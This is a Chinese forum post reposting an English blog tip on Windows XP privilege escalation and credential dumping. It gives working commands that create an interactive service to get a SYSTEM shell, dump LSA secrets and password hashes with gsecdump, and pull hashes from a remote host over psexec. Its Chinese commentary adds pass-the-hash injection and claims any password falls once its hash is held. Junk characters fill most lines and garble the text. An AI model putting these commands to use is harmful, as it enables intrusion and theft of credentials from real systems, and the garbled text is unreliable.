o get a DOS Prompt as NT system:
* ]: ~! ~/ T/ L( M' ?" h4 P
- y& N; l3 P& eC:\>sc create shellcmdline binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact
! I1 h+ j7 O/ y4 C7 D2 `! ~! {[SC] CreateService SUCCESS
# y7 w+ r' p$ w- \3 C2 H1 {; O- v! x0 ~# p4 a
C:\>sc start shellcmdline
) E2 x& |- |9 r" ^) P6 m[SC] StartService FAILED 1053:1 a& Z2 b5 X: A; l' M, I5 m: }
+ i2 M2 `" K- Z3 C6 XThe service did not respond to the start or control request in a timely fashion.# g: V4 b2 L& ]+ ~- _3 [
" B, c9 V& B7 a
C:\>sc delete shellcmdline
* p2 @- @& U A- J7 h4 a[SC] DeleteService SUCCESS6 J' U8 t, \% ]3 S. a" B! C
: i3 X( p. z0 G8 y------------* V, M7 U$ B& c/ [- ?0 i
% G5 ]- G2 a+ i9 @/ oThen in the new DOS window:# ]; [! K7 B& ^: B
7 }0 V$ ?( J& YMicrosoft Windows XP [Version 5.1.2600]( I9 T+ c. ?- |; O& x1 B: A, f7 G( R
(C) Copyright 1985-2001 Microsoft Corp.- ~) ` z. ] F( k& {+ a+ T5 k" V/ x
6 X) I f# L! E6 T- @C:\WINDOWS\system32>whoami
5 D( h4 C' H* H) Q/ x9 Z( t, b5 }NT AUTHORITY\SYSTEM( q: L( x+ K& T1 e" e
! W2 N- g( H+ G2 g& l
C:\WINDOWS\system32>gsecdump -h
$ ?+ h2 U0 d) cgsecdump v0.6 by Johannes Gumbel (链接标记johannes.gumbel@truesec.se)
6 p! @0 Z1 E7 p/ J7 s, z" Q9 wusage: gsecdump [options]- J4 A/ _! [. m& V3 T0 L
5 a- i& `" M6 @$ t# r7 K! J0 B' ^
options:
0 d' K# b3 ?9 l$ H-h [ --help ] show help1 b' ~1 E) |. i3 v9 D0 ]
-a [ --dump_all ] dump all secrets! f' r; p& R9 V/ ^( W
-l [ --dump_lsa ] dump lsa secrets
0 c6 V! Q: r" Q* G/ a! z-w [ --dump_wireless ] dump microsoft wireless connections5 o. A9 Q. U" D
-u [ --dump_usedhashes ] dump hashes from active logon sessions
' J# ^$ X/ R" r-s [ --dump_hashes ] dump hashes from SAM/AD$ K& @1 d$ d: N6 i( ?' G
& [' V3 \+ [2 X1 r5 W9 OAlthough I like to use:9 f9 P! C5 I/ V8 w- x( |3 R$ t
7 O! l9 b2 T1 a- h: N2 DPsExec v1.83 - Execute processes remotely
, T. s' k: F0 H5 M" u2 ^/ h' j, hCopyright (C) 2001-2007 Mark Russinovich
! s& m5 c% R) Q3 T( lSysinternals - 链接标记[url]www.sysinternals.com[/url]2 i1 \6 F. m+ A. \. }) v/ K
* G) R3 u( R1 d3 _4 KC:\>psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT, Z2 K- Q) O1 A' a) f& P" U
, A4 F2 a" \# v& l
to get the hashes from active logon sessions of a remote system.. s% o; f+ g& y# E2 r' G0 V
f- h8 g. \) I, M5 wThese are a lot better than getting a cachedump of the Cached Credentials because these hashes are LMHashes that can be easily broken with Rainbow Tables., j( a! B# i( W( g4 e" h. m0 X
; i: }; f1 t9 k+ b提示一下,可以使用pshtools工具包中的iam,把刚才使用gsecdump抓取出来HASH信息导入本地的lsass进程,来实现hash注入式攻击,还是老外厉害,这下管理员有得忙了,ARP欺骗的时候获得的LM/NThash,还有gethash获得的,其实根本不用破解密码,这个就是利用工具了,原文说的好,不管密码是设置4位还是127位,只要有了hash,100%就能搞定了.* G. V+ {7 d. B1 F% X
原文出处:链接标记[url]http://truesecurity.se/blogs/mur ... -text-password.aspx[/url]7 l- J; M0 T& P+ |( x
$ N9 B9 Z. E0 }% u, [5 y我看了下原文出处,貌似是/2007/03/16/郁闷啊,差距。
& L& L: p7 Z; x# K# J/ u$ b |
发表于 2012-11-6 21:09:29
收藏
支持
反对